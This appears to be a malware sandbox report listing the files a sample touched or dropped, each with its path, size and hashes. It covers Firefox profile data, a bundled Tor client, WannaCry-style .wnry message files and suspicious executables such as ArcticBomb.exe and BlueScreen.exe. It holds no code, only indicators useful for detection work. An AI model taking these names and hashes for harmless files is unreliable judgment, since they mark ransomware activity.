932b2f9f6d77071fe1737b05a0a271dc657818fe553728bc060ec3c0e4cef978

SHA512
c0f1aaea6aa5b9881fd92c127705665be3b83ec3d2fa95529effff92f49fa0655bee5573a9c93dbf0f726a05890b0a644a018fee7cd15693cdb2a81e98d3ef19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

Filesize
9KB

MD5
2e13dfb07a688e5b77da9459e23ed99c

SHA1
2eec6c3969d3a0685e97e60af66b5176f3f2299c

SHA256
108ebc4df4ce85afe4ff0d10ac72024125fedbef9272ba5718bdde017a6b7267

SHA512
ed60e43bd2b8fc36b03bebdfe229a6fd78053b0dbf3a6de1228a5783f16e4b82116af1117a509c9a1edfc50717fa0ef04435345c167d0d0d008cdeec96b64daf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

Filesize
8KB

MD5
4ef10d194d0546d48db9ed62a10f55ff

SHA1
585498f663847d73f8311926777e7a0a96306018

SHA256
c99bb99b25d84c0520d9115c06b2cee127e5ac58b8821e6b7e96de90991836ea

SHA512
51792018f4070e2617a9fc5193d93cd71739cdbcf5f4d955f4f86b9fe3ec45a1d2096f59eb7bb5c0a8cfd4a64ede3f933821b51bdb7a535150eb9ddc8998b2d0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\events\events

Filesize
162B

MD5
af2a384563b00e38bddaa01f4e109686

SHA1
6ec716e4888cfac9a20a59bad74b41f4b84deb4d

SHA256
09e500b9863468c2cf251bd54e107cf23ee59d965c0bc997d0fa4888755ae14c

SHA512
6ae2ad759f1b7e051fd2769bfce98d9b7a4961c619fb43aea10cfacb5c43bc9afe4498607f890be3d4acd7fe8b4b9299316482dfb43ba9d899068cf9fb4ac950

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\8531cccf-e622-4c92-bafb-947d35b7cc92

Filesize
790B

MD5
27855740861a065ac0b5dd2a35f7c692

SHA1
8020d83ddb21284cb0ff0cc026c59a7daf35201c

SHA256
8257d346b94cfefd210fef97c9b34209dcdb3562a0cc3e1f54aa0e8d65e9b350

SHA512
0bdd3b25afe8a47cc8041831ab0cd7c9197915163ca897ff9cd8e831afc121ad88193366f70f5a73628a257f79e32da13fc193c0e06d5d8e0a4b097f4995507c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\b6d8bc50-b6f3-4d13-8054-c8c9e70e6e80

Filesize
734B

MD5
fe30e2e7b25ab98ecc1886d22699bea8

SHA1
f5ad0931a746d92d93953840da9ec4a43a458e24

SHA256
6a513e7cfd2d826c030b5400d1a75bd096931cf5d8b88ad9429342619efc5151

SHA512
adc1747eaaa95a487cc00d75be2d60812a6534afb007bd0e1970178d1feea3ccb0a591e16c9bc38636e983851939524060d31f5cdf2d8fc2d004b6a0cec0257d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\bb68e6e6-6c86-459a-aab7-4fe5fb6c7f61

Filesize
767B

MD5
0a5be12f3e94d77dbcc613a63b6a3592

SHA1
50ce05508b384e20b07c757054a57b97a43bfd6e

SHA256
e8d5d608317879cf5fc841c23879d6a6f86152252b7b26f4e5a9587bf0c7bb9e

SHA512
1985cc367be12873ce05abe49686b5df69fc19d943fb78a62d8980413acd385d8b046aa4854c7856299d1d827e898787fe9070e4059cab7cdf61f1005aed3dce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\extensions.json

Filesize
36KB

MD5
36f79dd4a6f5d82305eb7ce6622a8fdf

SHA1
ea479ea7ac0d437925c7a3e36dd892ccaa6390b9

SHA256
16a5faace8c5fb442b6030d8d157b6df5923113a6b5024f768d420b0807bb04d

SHA512
9182184fa9091350f480957a716f8d977713aa5543e2ab3ee00ed65e8e026d306d8ed9aab5f8f0a13e55e13df98c50a221e7dfff091cd8c8f7ff8f00709c2dfb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\favicons.sqlite

Filesize
5.0MB

MD5
6fd229c9d4becdb47a80fe2fc4035738

SHA1
6d395e3058fb6a8e41dbeba7b92202e99fcee67a

SHA256
c7e58b61dce97ce5047cff7d110539327ac273a2f348e1d4bff37338e1cef0f5

SHA512
724c358e39eb65c6c70554dc70584cfe3fc66753ae87025df4e15b0b82ea3c8eb136c76054756b5fe6eedbb6b178babbfb8f23ea0b38d838985d0333b15ab045

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\formhistory.sqlite

Filesize
256KB

MD5
2fbf798f1c006f9e6f8b14a1b46dd3e6

SHA1
5282d5c00c16369f2a33ca375a58cc60639873ec

SHA256
599afc8ceee7024821e1ff631567ce56ba8c623bbafc19d386dd511289fee02c

SHA512
4af5959723b85ed796e7119218bc23b4e46b7fc84a664f315a5725560a2c9a129ea66ad640197aa9c520fa2174e6959a7cbbe76381b14b487c5b6adace63c1db

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\permissions.sqlite

Filesize
96KB

MD5
d29f6a0cf99826bedb243887924b913f

SHA1
4377bcb0422b12f3251138e292edc2ddc33ccdc5

SHA256
5971871f5d8b0f1374f3901c4b54b6abf6e24b249596c13cb2c33d6b755ec29f

SHA512
f2984230f98c4f61eca6524149dc285d8e199dcf864b8b1c4f18be8735a6cb44f6d9d965aee56b216d86bdafaa14beb93e8d5fe2390aa6e422ff4297751e9f72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\places.sqlite

Filesize
5.0MB

MD5
bb40ef86164a0a2ee6507913da28c3f8

SHA1
817ee6b947c44f1402a1ee822f92dfc94a193932

SHA256
463e04f81c48276dd98177f251fe39eabdf6f56c76b09f6b0efb275db736c005

SHA512
5f6e3c5f00f6b2e922a60a930998e0e96b395c692b28f4f71608d6947e68a38e6d49ad262875760b0f8282352e48b83a560cd42792e3eb39583c13594add5b4f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

Filesize
7KB

MD5
905f4a4b9e87d165badd84e770ce44a8

SHA1
0d1df82d98757b1e6b37bd5b1203864924da3989

SHA256
6357ff6733023c8f6880d55e2bd0dee97c43962fdee7b6cac0a82781694996e9

SHA512
2a93a38e5edf7cb8ef2cc1a841f707b9bb816f591cd12f02c445521a466cf2771bcd3547bd3737832bb7d48334c53baadbd268400702bb163cd658c39c0bbe69

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

Filesize
7KB

MD5
592d00d095dc5e1bc5b5a87f2a7979b4

SHA1
f77b2dbf35b9a41d2cedceb88952b8a4301cbb58

SHA256
029be6fb130d8d1201d833a6da1e6665874652489e836937f4aebc4aac92783e

SHA512
0b2b587a1620dac2215200a216fe142cdc1b4bb656e47b60dc02fbddb3fdcaf2f81eb8d869d19ee625485dc46ce8b40c53a19c3bc02b41b6fded1b62324bd118

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

Filesize
6KB

MD5
2de9e1bc32d2b0fa321c7948c481770b

SHA1
537c443eafa3799f8509979da1df85347b8881e3

SHA256
cd6b838379cfdafaf07171270a2d033a34d36422611172a83a4997d8987d5020

SHA512
29b768971b76c5259dd85eb5d2ca18fc1b9d2d7652ab4d81af5873c723920427b5c996054e9db48d86bd3648993391d87f2006839b80c27b6da1e2abd656d2ad

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

Filesize
6KB

MD5
f5ea9b7bdc3ac560319185c5e31eaf36

SHA1
a8bd9e415b61358f773b1bf6758d48506cec8a6f

SHA256
be5f5ea44c5dd846cc14d263c805c7959001f937e3ce531ee2231c4032bc6afd

SHA512
0fa699062723d0f865a92368af98ff79c3571eed0c504837a37d0d5afa242b89a7a7fcf13afb5e2ba473ecc1b50c1fd1725592e4fbf34712ad963b9885f560ab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

Filesize
6KB

MD5
84b06ee8a92e017d17285266dc15079d

SHA1
db559b6b8b088c365529dcde1eb8c0e77ad612e1

SHA256
adcb59d2a72892c5920e431a94d7c06511edc1cfd6fd3e0e522cd016088cb1d7

SHA512
a45fa7d8c35868d5b8e71c9609b351ecb52aa11418dac61ecdf4d905e821053897b0c055e4f6cc04af7af187f0945ff1cad8d2c0f6f10ba69b1aceee4e848504

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

Filesize
6KB

MD5
cc8535fea9aab1dd0b16013b8fbd05b6

SHA1
aff13ddb08c206e69f55d7593cabc6dffd5c8659

SHA256
b62a57e5a67763d72418d01d1e77542b59fe65267dbba0b2bc1771578928697e

SHA512
9f4e38ede9017d54a34fa8f20dad5a82d675c8b7fa4a2e45dbd437d341cc022f8e2cb7a8fe617a1c3c671e83a1a282c2e36157fb71bf9cefe48d786b213ed638

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\protections.sqlite

Filesize
64KB

MD5
deeced8825e857ead7ba3784966be7be

SHA1
e72a09807d97d0aeb8baedd537f2489306e25490

SHA256
b9f022442a1506e592bf51284091a8a7fe17580b165d07e70c06fd6827343a54

SHA512
01d303232d6481af322137b44fef6c2a584f0643c48bab2836f9fe3193207015da7f7514fe338500ae4469651e3d9618293858ae507e722198a249257677099e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionCheckpoints.json

Filesize
288B

MD5
948a7403e323297c6bb8a5c791b42866

SHA1
88a555717e8a4a33eccfb7d47a2a4aa31038f9c0

SHA256
2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e

SHA512
17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionCheckpoints.json.tmp

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionCheckpoints.json.tmp

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
ac1c8eb6b0b061bd6ddba50829882da6

SHA1
920fbcd4ffb47a4158af507638094ecf0922f82e

SHA256
610068335691744d7f732b94484e35780bf4ea92c13be2d5a56fd25c2a835919

SHA512
260091c6dd182e69ac10351e3f0792ef2f62061f63def5d8fbf98ed6cd7764d96429707a30a1f879e6f84303f93059dcff1855c498156477009a2d28c549e09b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
83cad0aa747db5b880e2cdf1e7a61278

SHA1
63f31bb03fa5fcde55a9900207f8f79dd2765a57

SHA256
71426ad7545a43968e6750c715545b99c11bafd69153b9174ceafd7d7b624eb4

SHA512
30dd626a0d955fcdf6c803f2c0f03b0285a5fe120b7c2a729ff42c771d6f4bb16155f03ef8292b730b5c0928be304a752074d34fd5c814b59b8baa17510bccfa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
302cbbea5587f90d18f35bc217ec4f7e

SHA1
d95336db231de4867674a6bfc15da98436f95f1f

SHA256
ad98fdeada61dc601d4835e08194d55c32f77ab489bd19b07b82c55ce65db928

SHA512
6b29d5819e3be4ac39417d15bd686b33952262fdbfc17faeeb80a0c67f2de22763f6269585a39ce74dce1371333f731e9e1b123319a752bef12d80134ef15101

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
6dd2da0eb7154e9cecd50605c0fa7991

SHA1
478ada3a83268bdb80666b6d4ed56867c9457661

SHA256
dae56815359523dea367ad0906be334b0a87fa189024c6221449d875b359dc7a

SHA512
15c3f23c4e67eefcd3bcb5f2c560421583b23ff52582ff49abd4fcec1aecc0af84d3cb77c2fd94cd1ec832e4ed1a30296397e987091fcc5e234fbe26af205659

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
16c786fb9bb682d2d3cb117b41bd1c09

SHA1
a5b55da4cf8bb317654c36f28d94648cb2a39996

SHA256
1003431f396e55418e657071b4a164c73459647a1283ecc667b26e017f72d826

SHA512
f97d5cb7f627b8e343f430cba3946998daec696562cb50107060dc08c99372887d05cae3f9cbecb707f26d4951431d8a480e2ee01c792355c8b442f90952fa12

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
9636c0f1087e5daa7536ca96bf43d9b6

SHA1
abfe04834e5270bd8756b0bd61ec5c2bfbebe047

SHA256
5d8988eb11c5613e54b76799abf60c110c67723d2d8bfa17b18c59876ffd18bf

SHA512
d965337afc632d0ab9e348db3f294453e294ccccee4c713e4f69b81f6d8be161201617821c737c601d3d50eba2b19fcf8a7139dbfb4d86efc454e8b49aa25cae

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
801e12c7511ea262194e60a41dad473f

SHA1
019a621163f075ff3c95a7a6811e56e9628e8bd5

SHA256
01b58875ff0de8baf6e0a5b56910d202a1c0d73f5a65229fc3216d074f31d44a

SHA512
7007ad5a2010b55aecd7b022b9e8be6e7a7238785faf22a0205df32c2d64ec300f31d7a62b4d8817ac0b13188eac8b4f2aada2945c03eb53807b2b851b44af3f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore.jsonlz4

Filesize
4KB

MD5
2a330519a43b042651e7b50b93b514be

SHA1
c841b8cd5a4f7b849e19172889b133f200416aed

SHA256
7d500c5b2d682211657e8088f52b38b0bdc24a374c8207f4bc31c0336aad7bbb

SHA512
fddaad809a6a15a19665db6c3c488de389240cd28c53d66e6bcae7b052b9591b1c694215943f7cb04bf7a88d90de4f67c6c981a67f5d0024f662bb3dc2c10bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage.sqlite

Filesize
4KB

MD5
05f202b60ddbe7838f5501e482210fdd

SHA1
9645f51b5b0a82ab0bdaf2b7f5a32998a0b5a041

SHA256
c81dc7d7826dca9bb40530db9ce8729747e307442b4d9ea83e7c7823454ad40f

SHA512
c93dc6da05cc8af4a2627ee2052b595ad8483f517b6f46b55fc990db867bb717070a89e347deeaebdbb83dcc1ab1f92f379da96556d58e2b3a0e0c9f5a48085b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.google.com\ls\data.sqlite

Filesize
6KB

MD5
efba773c52bf13aec5afefe36d689fbf

SHA1
bc1a5450246a6abb15f6255a3acdd89ab0c8d9a9

SHA256
d1ef544014896ce1313a639f9f0576b6e13a5528e20bb62cfd5e37382f015579

SHA512
d5005b815533dba29d8683bd1e0de078cc65cb34ff2f330fb68e69f332a34d49cca5375bb77da6767712482cfbecc9817b497d2e59d0b3d18ca00a677246b024

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.google.com\ls\usage

Filesize
12B

MD5
4c428e195a2fad0b912480f1aaa48bf3

SHA1
52a8ec75e9ebe26a80438cfa5b234ccd96f24621

SHA256
330e0baa0683f9a1187cfcee449c80c8d142c70ed58f6ed5bff634f23f399a8d

SHA512
795d309afb1c8bd2bb3ffa40ad5632fca3a1a8926143a1592a051ec8667bddcb21d0540fd33a898e4f28bfd65e13ae96693d96b11c13adcae09ff1f415a13ef2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

Filesize
48KB

MD5
184a4135c39752372f766c6b0ac051d5

SHA1
65ed8fa44a6b5b079fd95f0a9b8207f57b958e70

SHA256
722ef1f5346de3077e0dd3aa1ccac1a82866ccc23e206f1f2eefc9f1e9248609

SHA512
f13fe9d4818a48fe7c5b9504f0d8cf399e313b1f68ab9fc3fb71db3cf8948ad6afe8d44c29965cf98526f6256959b2da63e0510108bd62dd38b00bfd4376825b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
e7d901ad03d22078f4c42ecc83c3bd45

SHA1
13ffe2ced2026e6b99c39a96d006c7832a72ba17

SHA256
fddee54013f830a84e74dce5679f6e4c3c71b4c5c51ecdf58bcef7e27eba4f17

SHA512
8e7373116183db845f03c74e28effbe85b53c6c109f0a1a867fc4daa2944c099846644c5b6ecfa6408091d097a08b3f1b8cedcbeffbdcfaa14147f6b76663ec9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\targeting.snapshot.json

Filesize
3KB

MD5
732fd4a56c3b8417bb4358ba0ecaa8f0

SHA1
d9ca6cb286e7e0230f46b84aebb8f91fc1ed3915

SHA256
7bbac92da663ebc55766ace4f85aefddd4f89863c2bc014b328119b8c1179f5c

SHA512
4aef0654508ba656bef00652700fa3c0053b17339a450497723d522233c1226e72713b2f34f0f7c37f68e1f0de3258f227c4b6ee35b56b9a482e73eee3774c7c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\weave\toFetch\tabs.json.tmp

Filesize
10B

MD5
f20674a0751f58bbd67ada26a34ad922

SHA1
72a8da9e69d207c3b03adcd315cab704d55d5d5f

SHA256
8f05bafd61f29998ca102b333f853628502d4e45d53cff41148d6dd15f011792

SHA512
2bce112a766304daa2725740622d2afb6fe2221b242e4cb0276a8665d631109fbd498a57ca43f9ca67b14e52402abe900f5bac9502eac819a6617d133c1ba6a3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\xulstore.json

Filesize
120B

MD5
05e1ddb4298be4c948c3ae839859c3e9

SHA1
ea9195602eeed8d06644026809e07b3ad29335e5

SHA256
1c2c5d5211674c3c8473e0589085499471399e53e9a85d7dd3b075fef6cbb6be

SHA512
3177b48cd0c877821419d7e5eb247a4c899bc37258994f22257ceaafefb316e6f5959faae02e380e432d7752f0218d45d56d6878c1e751d201d9fdb3ff98612e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\xulstore.json

Filesize
220B

MD5
8d80afe7622d6f308bb67a2fb39ee7a8

SHA1
4b10b5b4619e3d8d7b465e73dfc9536df02e823b

SHA256
4e6597679470748259be6b46cdf2355292632ba9cec7e3d3f11b7a488a7e8b9a

SHA512
d6778e741f585bed4ffa5ecdfcabb531183c2548c3edb2bd1ea2757732881490bfbacabcb45ea6d803f9cc41105b73656d2343bafbc00d796efe1edf930f9cca

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
19.7MB

MD5
797f188e8bc676a9d2085388ef05fcee

SHA1
3fb35f1c0b33761628b3d3461b02d67cfcd9c565

SHA256
36d2629a6e8823da65518752c3ad60a99febfbafc1923b91719e49c13e4024f2

SHA512
6e1ced863a829a1dbbdffb8b0f69025ab6ecc6ddfccc00d211656eec8ba0b58c11aa105f9df998644859b33e754fc70c59731cce4f2a85ed7dfd6ff7110b04dd

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\ArcticBomb.exe

Filesize
125KB

MD5
ea534626d73f9eb0e134de9885054892

SHA1
ab03e674b407aecf29c907b39717dec004843b13

SHA256
322eb96fc33119d8ed21b45f1cd57670f74fb42fd8888275ca4879dce1c1511c

SHA512
c8cda90323fd94387a566641ec48cb086540a400726032f3261151afe8a981730688a4dcd0983d9585355e22833a035ef627dbd1f643c4399f9ddce118a3a851

Download Submit
C:\Users\Admin\Downloads\BlueScreen.exe

Filesize
9KB

MD5
b01ee228c4a61a5c06b01160790f9f7c

SHA1
e7cc238b6767401f6e3018d3f0acfe6d207450f8

SHA256
14e6ac84d824c0cf6ea8ebb5b3be10f8893449474096e59ff0fd878d49d0c160

SHA512
c849231c19590e61fbf15847af5062f817247f2bcd476700f1e1fa52dcafa5f0417cc01906b44c890be8cef9347e3c8f6b1594d750b1cebdd6a71256fed79140

Download Submit
C:\Users\Admin\Downloads\ColorBug.exe

Filesize
53KB

MD5
6536b10e5a713803d034c607d2de19e3

SHA1
a6000c05f565a36d2250bdab2ce78f505ca624b7

SHA256
775ba68597507cf3c24663f5016d257446abeb66627f20f8f832c0860cad84de

SHA512
61727cf0b150aad6965b4f118f33fd43600fb23dde5f0a3e780cc9998dfcc038b7542bfae9043ce28fb08d613c2a91ff9166f28a2a449d0e3253adc2cb110018

Download Submit
C:\Users\Admin\Downloads\DesktopPuzzle.exe

Filesize
239KB

MD5
2f8f6e90ca211d7ef5f6cf3c995a40e7

SHA1
f8940f280c81273b11a20d4bfb43715155f6e122

SHA256
1f5a26f24a2bfdd301008f0cc51a6c3762f41b926f974c814f1ecaa4cb28e5e6

SHA512
2b38475550edee5519e33bd18fea510ad73345a27c20f6457710498d34e3d0cf05b0f96f32d018e7dc154a6f2232ea7e3145fd0ed5fb498f9e4702a4be1bb9c8

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 107870.crdownload

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Default\Desktop\@[email protected]

